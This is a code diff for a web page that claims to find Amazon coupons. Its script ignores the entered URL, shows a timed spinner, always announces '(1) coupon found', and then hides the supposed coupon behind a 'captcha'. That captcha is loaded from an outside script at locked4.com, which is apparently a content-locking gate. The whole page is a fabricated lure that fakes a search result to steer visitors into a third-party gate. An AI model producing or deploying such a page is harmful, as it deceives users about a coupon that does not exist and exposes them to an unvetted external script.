--- a/amazon/index.html
+++ b/amazon/index.html
@@ -9,22 +9,23 @@
   body, html {
     margin: 0;
     padding: 0;
-    font-family: 'Roboto', sans-serif;;
+    font-family: 'Roboto', sans-serif;
     background-color: #f8f9fa;
     text-align: center;
   }
-  .search-box, .captcha-section {
-    margin-top: 50px;
+  .logo {
+    margin-top: 100px;
   }
-  .search-input, .captcha-display {
+  .search-box {
+    margin-top: 20px;
+  }
+  .search-input {
     width: 80%;
     padding: 15px;
     border: 1px solid #ddd;
     font-size: 16px;
     border-radius: 20px;
     outline: none;
-    display: block;
-    margin: 20px auto;
   }
   .button {
     padding: 10px 20px;
@@ -36,6 +37,16 @@
     cursor: pointer;
     margin-top: 10px;
     outline: none;
+  }
+  .footer {
+    margin-top: 30px;
+    padding: 10px;
+    background-color: #f2f2f2;
+    color: #525252;
+  }
+  #loading, .captcha-loading {
+    display: none;
+    margin-top: 20px;
   }
   .loader {
     border: 4px solid #f3f3f3;
@@ -50,54 +61,55 @@
     0% { transform: rotate(0deg); }
     100% { transform: rotate(360deg); }
   }
+  .coupon-box {
+    display: none;
+    background-color: #fff;
+    padding: 20px;
+    border-radius: 8px;
+    box-shadow: 0 4px 8px rgba(0,0,0,0.1);
+    width: 80%;
+    margin: 20px auto;
+  }
   .coupon-message {
     color: #333;
     margin-bottom: 20px;
     font-weight: bold;
   }
-  .captcha-title {
-    font-size: 20px;
-    margin: 30px 0;
-    color: #333;
+  .beautiful-divider {
+    margin: 20px auto 30px;
+    width: 30%;
+    border-bottom: 3px solid #4caf50;
+    border-radius: 2px;
   }
-  .divider {
-    background-color: #4caf50;
-    height: 4px;
-    width: 60%;
-    margin: 25px auto;
-    border-radius: 4px;
-  }
-  .footer {
-    margin-top: 30px;
-    padding: 10px;
-    background-color: #f2f2f2;
-    color: #525252;
+  .captcha-wrapper {
+    margin-top: 10px;
   }
   @media only screen and (max-width: 600px) {
-    .search-input, .captcha-display {
+    .coupon-box {
       width: 90%;
+    }
+    .beautiful-divider {
+      width: 60%;
     }
   }
 </style>
 </head>
 <body>
 
+<div class="logo">
+  <img src="logo.png" alt="Website Logo" style="max-width: 400px;">
+</div>
+
 <div class="search-box">
   <input type="text" class="search-input" placeholder="Enter Amazon product URL">
   <button class="button" onclick="findCoupon()">Find Coupon</button>
 </div>
 
-<div id="loading" class="search-box" style="display:none;">
+<div id="loading" class="search-box">
   <div class="loader"></div>
 </div>
 
-<div class="captcha-section" id="captchaSection" style="display:none;">
-  <div class="coupon-message">(1) coupon found *</div>
-  <div class="divider"></div> <!-- Beautiful separation -->
-  <div class="captcha-title">Solve the captcha below to view the Coupon</div>
-  <div class="captcha-display" id="captchaDisplay">
-    <!-- Captcha will be rendered here -->
-  </div>
+<div id="couponBox" class="coupon-box">
 </div>
 
 <div class="footer">
@@ -108,30 +120,30 @@
 <script>
 function findCoupon() {
   const loadingElem = document.getElementById('loading');
+  const couponBox = document.getElementById('couponBox');
+  couponBox.innerHTML = ''; // Clear previous content
+  couponBox.style.display = 'none';
   loadingElem.style.display = 'block';
   
   setTimeout(() => {
     loadingElem.style.display = 'none';
-    displayCaptcha();
-  }, 3000); // Suppose the captcha loads in a maximum of 3 seconds.
-}
-
-function displayCaptcha() {
-  const captchaSection = document.getElementById('captchaSection');
-  const captchaDisplay = document.getElementById('captchaDisplay');
-
-  // Dynamically load and display captcha 
-  // For demonstration, using an element to simulate captcha for now.
-  let captchaPlaceholder = document.createElement('div');
-  captchaPlaceholder.innerHTML = "<div data-captcha-enable='true'></div>"; // Simulated Captcha element
-  captchaDisplay.appendChild(captchaPlaceholder);
-
-  captchaSection.style.display = 'block';
+    const couponHTML = `
+      <div class="coupon-message">(1) coupon found</div>
+      <div class="beautiful-divider"></div>
+      <h5 style="margin-bottom: 20px;">Solve the captcha below to view the Coupon</h5>
+      <div class="captcha-wrapper">
+        <div data-captcha-enable="true"></div> <!-- Captcha will be rendered here -->
+      </div>
+    `;
+    
+    couponBox.innerHTML = couponHTML;
+    couponBox.style.display = 'block';
+  }, 3000);
 }
 </script>
 
-<!-- Placeholder for the Captcha script inclusion -->
-<!-- Mimic loading captcha script dynamically if needed -->
+<!-- Captcha Script -->
+<script type="text/javascript" src="https://locked4.com/cp/js/j342y"></script>
 
 </body>
 </html>
